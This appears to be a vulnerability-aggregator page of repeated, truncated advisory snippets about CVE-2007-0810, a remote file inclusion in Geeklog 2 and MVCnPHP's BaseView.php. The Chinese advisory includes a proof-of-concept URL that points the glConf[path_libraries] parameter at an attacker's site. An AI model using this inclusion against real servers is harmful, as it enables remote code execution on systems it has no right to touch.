Geeklog远程文件包含漏洞

Geeklog是一款基于PHP的WEB应用程序。 Geeklog不正确过滤用户提交的输入，远程攻击者可以利用漏洞以WEB权限执行任意命令。 问题是多个脚本对用户提交的'glConfpathlibraries'参数缺少过滤，指定远程服务器上的文件作为包含参数，可导致以WEB权限执行任意命令。 Geeklog 2.0 目前没有解决方案提供： http://geeklog.sourceforge.net/ http://www.example.com/path/Geeklog/MVCnPHP/BaseView.php?glConfpathlibraries=attacker site...

CVE-2007-0810

CVE-2007-0810 describes a PHP remote file inclusion in GeekLog 2 and earlier via glConf[path_libraries] in MVCnPHP/BaseView.php, allowing remote execution of PHP code by supplying a URL. The vulnerability’s root cause is a file inclusion flaw that can process an attacker-supplied URL, with impact...

GeekLog <= 2. (BaseView.php) Remote File Include Vulnerabilities

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= WebBuilder = 2.0 Remote File Include Vulnerability -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= Discovered by GolDMMahmnoodali & & Contact: [email protected]...

GeekLog <= 2. (BaseView.php) Remote File Include Vulnerabilities

GeekLog = 2. BaseView.php Remote File Include Vulnerabilities Discovered by GolDMMahmnoodali & & Contact: [email protected] URL: http://www.geeklog.net/nightly/geeklog2-cvs-nightly.tar.gz V.CODE: In : path/system/libraries/Geeklog/MVCnPHP/BaseView.php require $glConf'pathlibraries'...

geeklog-rfi.txt

GeekLog = 2. BaseView.php Remote File Include Vulnerabilities Discovered by GolDMMahmnoodali & & Contact: [email protected] URL: http://www.geeklog.net/nightly/geeklog2-cvs-nightly.tar.gz V.CODE: In : path/system/libraries/Geeklog/MVCnPHP/BaseView.php require $glConf'pathlibraries'...

Geeklog <= 2.0 BaseView.php glConf Parameter Remote File Inclusion

Binary data 3900.prm...

Geeklog 2 - BaseView.php Remote File Inclusion

Geeklog 2 - BaseView.php Remote File Inclusion GeekLog = 2.× BaseView.php Remote File Include Vulnerabilities Discovered by GolDMMahmnoodali & & Contact: [email protected] URL: http://www.geeklog.net/nightly/geeklog2-cvs-nightly.tar.gz V.CODE: In : path/system/libraries/Geeklog/MVCnPHP/BaseView.php...

Geeklog 2 (BaseView.php) Remote File Inclusion Vulnerability

No description provided by source. GeekLog = 2...

Geeklog 2 (BaseView.php) Remote File Inclusion Vulnerability

Exploit for unknown platform in category web applications ============================================================ Geeklog 2 BaseView.php Remote File Inclusion Vulnerability ============================================================ GeekLog = 2.x BaseView.php Remote File Include...

Geeklog 2 - &#039;BaseView.php&#039; Remote File Inclusion

GeekLog = 2.× BaseView.php Remote File Include Vulnerabilities Discovered by GolDMMahmnoodali & & Contact: [email protected] URL: http://www.geeklog.net/nightly/geeklog2-cvs-nightly.tar.gz V.CODE: In : path/system/libraries/Geeklog/MVCnPHP/BaseView.php require $glConf'pathlibraries'...

MVCnPHP <= 3.0 glConf[path_libraries] Remote Include Vulnerabilities

Exploit for unknown platform in category web applications ==================================================================== MVCnPHP = 3.0 glConfpathlibraries Remote Include Vulnerabilities ==================================================================== MVCnPHP Remote File Inclusion ToXiC...

MVCnPHP 3.0 - glConf[path_libraries] Remote File Inclusion

MVCnPHP 3.0 - glConfpathlibraries Remote File Inclusion MVCnPHP Remote File Inclusion ToXiC CrEw Bug Found by Drago84 Page Sources: http://freshmeat.net/redir/mvcnphp/46123/urltgz/GeeklogMVCnPHP-3.0.0.tgz Page Affect: BaseCommand.php BaseLoader.php BaseView.php ExP:...

MVCnPHP 3.0 - glConf[path_libraries] Remote File Inclusion

MVCnPHP Remote File Inclusion ToXiC CrEw Bug Found by Drago84 Page Sources: http://freshmeat.net/redir/mvcnphp/46123/urltgz/GeeklogMVCnPHP-3.0.0.tgz Page Affect: BaseCommand.php BaseLoader.php BaseView.php ExP:...